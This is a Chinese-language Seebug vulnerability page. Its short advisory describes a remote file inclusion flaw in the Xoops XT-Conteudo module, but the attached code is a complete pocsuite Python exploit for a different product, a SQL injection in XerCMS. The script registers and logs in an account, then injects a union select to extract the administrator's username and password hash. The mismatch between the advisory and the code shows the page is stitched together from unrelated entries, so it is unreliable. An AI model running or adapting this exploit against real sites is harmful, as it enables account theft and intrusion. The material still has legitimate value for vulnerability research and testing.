Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:1885
HistoryJun 18, 2007 - 12:00 a.m.

Xoops XT-Conteudo模块Spaw_Control.Class.PHP远程文件包含漏洞

2007-06-1800:00:00
Root
www.seebug.org
32
JSON

Xoops XT-Conteudo是一款基于PHP的WEB应用程序。

Xoops XT-Conteudo不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。

问题是由于’spaw_control.class.php’脚本对用户提交的’spaw_root’参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。

Xoops XT-Conteudo Module 1.52
目前没有详细解决方案提供:

<a href=“http://www.xoops.org/” target=“_blank”>http://www.xoops.org/</a>


                                                #!/usr/bin/env python
# coding: utf-8
import re
import os
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '1885'  # vul ID
    version = '1'
    author = ['ricter']
    vulDate = '2015-06-01'
    createDate = '2015-06-01'
    updateDate = '2015-06-01'
    references = ['']
    name = 'XerCMS 20150528 /XerCMS/Modules/member/index.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.xercms.com/'
    appName = 'XerCMS'
    appVersion = '20150528'
    vulType = 'SQL Injection'
    desc = '''
        XerCMS 将用户传入的字符直接带入无单引号保护的 SQL 语句,导致 SQL 注入
        漏洞,可以获取管理员的账号密码,造成信息泄露。
    '''

    samples = ['']

    def random(self, length=5):
        return os.urandom(length).encode('hex')[:length]

    def exploit(self, payload):
        reg_url = '%s/?m=member&a=registerPost' % self.url
        login_url = '%s/?m=member&a=loginPost' % self.url
        exploit_url = (
            '%s/?m=member&a=message&d=rely&id=0 union select 0,(%s)' %
            (self.url, payload)
        )
        user = {
            'member[name]': self.random(),
            'member[pass]': self.random(10),
        }
        reg_user = {
            'member[name]': user['member[name]'],
            'member[pass]': user['member[pass]'],
            'member[pass2]': user['member[pass]'],
            'member[nick]': self.random(),
            'member[email]': '%[email protected]' % self.random(),
        }

        sess = req.Session()
        sess.post(reg_url, data=reg_user)
        sess.post(login_url, data=user)
        return sess.get(exploit_url).content

    def _attack(self):
        result = {}
        response = self.exploit('select concat(name,0x3a3a,pass)from xercms_me'
                                'mber limit 1')
        data = re.search('name="message\[uid\]" value="(?P<Username>.*?)::(?P<'
                         'Password>[\w\d]{32})"', response)
        if data:
            result['AdminInfo'] = data.groupdict()

        return self.parse_attack(result)

    def _verify(self):
        result = {}
        response = self.exploit('md5(24091293)')
        if 'd55f9a6634498b197e64e134121405db' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
JSON